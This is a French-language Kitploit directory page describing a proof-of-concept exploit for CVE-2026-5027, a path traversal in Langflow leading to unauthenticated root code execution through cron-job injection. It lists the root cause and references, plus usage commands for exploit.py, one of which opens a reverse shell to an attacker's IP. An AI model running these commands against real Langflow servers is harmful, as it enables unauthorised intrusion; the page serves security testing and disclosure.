Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-5027 — Preuve de concept d'exploitation pour CVE-2026-5027, une vulnérabilité de traversée de chemin dans Langflow menant à une exécution de code à distance non authentifiée via l'injection de tâches cron. | Kitploit
Outils/GitHubGitHub/yahiahamza/cve-2026-5027
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubyahiahamza/cve-2026-5027

CVE-2026-5027

Preuve de concept d'exploitation pour CVE-2026-5027, une vulnérabilité de traversée de chemin dans Langflow menant à une exécution de code à distance non authentifiée via l'injection de tâches cron.

Voir le dépôt
42il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-5027 - Traversée de chemin Langflow menant à l'exécution de code à distance

Description

Les versions de Langflow jusqu'à la 1.8.4 incluse ne neutralisent pas le paramètre filename dans le point de terminaison POST /api/v2/files. Un attaquant peut utiliser des séquences de traversée de chemin (../) pour écrire des fichiers à des emplacements arbitraires sur le système de fichiers. Combiné à la configuration de connexion automatique par défaut de Langflow, cela est exploitable sans aucune authentification, menant à une exécution de code à distance en tant que root via l'injection de tâches cron.

Versions concernées

  • Vulnérable : Langflow <= 1.8.4
  • Corrigé : Aucun correctif disponible au moment de la rédaction
  • Configuration par défaut : Connexion automatique activée (exploitation non authentifiée)
  • Avis de sécurité : Tenable TRA-2026-26

Utilisation

root@kitploit:~
# Preuve de concept (écrit un fichier de test dans /tmp/)
python3 exploit.py -t http://target:7860

# Avec des identifiants (si la connexion automatique est désactivée)
python3 exploit.py -t http://target:7860 -u admin -p password

# Shell inversé via une tâche cron
python3 exploit.py -t http://target:7860 --lhost YOUR_IP --lport 4444

Exemple de sortie

CVE-2026-5027 Exploit

CVE-2026-5027 Reverse Shell

Cause racine

La fonction upload_user_file() dans src/backend/base/langflow/api/v2/files.py transmet file.filename directement au service de stockage sans neutralisation. La fonction LocalStorageService.save_file() construit le chemin en utilisant folder_path / file_name, ce qui n'empêche pas la traversée de répertoire.

Références

  • Avis de sécurité Tenable TRA-2026-26
  • Langflow GitHub
  • CVE-2026-5027 : Traversée de chemin Langflow menant à l'exécution de code à distance - Analyse technique complète

Avertissement

Cet outil est fourni uniquement pour des tests de sécurité autorisés et à des fins éducatives. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.

Auteur

Yahia Hamza - https://yh.do

Télécharger l’outil